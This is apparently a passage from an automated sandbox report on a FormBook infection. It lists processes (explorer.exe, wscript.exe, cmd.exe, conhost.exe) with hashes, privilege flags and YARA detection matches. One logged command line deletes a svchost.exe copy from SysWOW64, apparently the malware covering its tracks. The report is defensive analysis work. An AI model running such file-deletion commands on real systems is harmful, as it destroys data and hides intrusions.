                                                                      MD5 hash:FA6C268A5B5BDA067A901764D203D433
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.277382659.0000000002DD0000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.277382659.0000000002DD0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.277382659.0000000002DD0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.277759385.00000000035D0000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.277759385.00000000035D0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.277759385.00000000035D0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.277108812.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.277108812.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.277108812.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      Reputation:high

                                                                      Analysis Process: explorer.exe PID: 3472 Parent PID: 6252

                                                                      General

                                                                      Start time:06:09:48
                                                                      Start date:12/05/2021
                                                                      Path:C:\Windows\explorer.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:
                                                                      Imagebase:0x7ff693d90000
                                                                      File size:3933184 bytes
                                                                      MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high

                                                                      Analysis Process: wscript.exe PID: 6712 Parent PID: 3472

                                                                      General

                                                                      Start time:06:10:01
                                                                      Start date:12/05/2021
                                                                      Path:C:\Windows\SysWOW64\wscript.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:C:\Windows\SysWOW64\wscript.exe
                                                                      Imagebase:0x1260000
                                                                      File size:147456 bytes
                                                                      MD5 hash:7075DD7B9BE8807FCA93ACD86F724884
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.494703247.0000000000610000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.494703247.0000000000610000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.494703247.0000000000610000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.495776656.0000000001120000.00000004.00000001.sdmp, Author: Joe Security
                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.495776656.0000000001120000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.495776656.0000000001120000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.495702077.00000000010F0000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.495702077.00000000010F0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.495702077.00000000010F0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      Reputation:high

                                                                      Analysis Process: cmd.exe PID: 6816 Parent PID: 6712

                                                                      General

                                                                      Start time:06:10:06
                                                                      Start date:12/05/2021
                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:/c del 'C:\Windows\SysWOW64\svchost.exe'
                                                                      Imagebase:0x290000
                                                                      File size:232960 bytes
                                                                      MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high

                                                                      Analysis Process: conhost.exe PID: 6848 Parent PID: 6816

                                                                      General

                                                                      Start time:06:10:06
                                                                      Start date:12/05/2021
                                                                      Path:C:\Windows\System32\conhost.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                      Imagebase:0x7ff7ecfc0000
                                                                      File size:625664 bytes
                                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high

                                                                      Disassembly

                                                                      Code Analysis

                                                                      Reset < >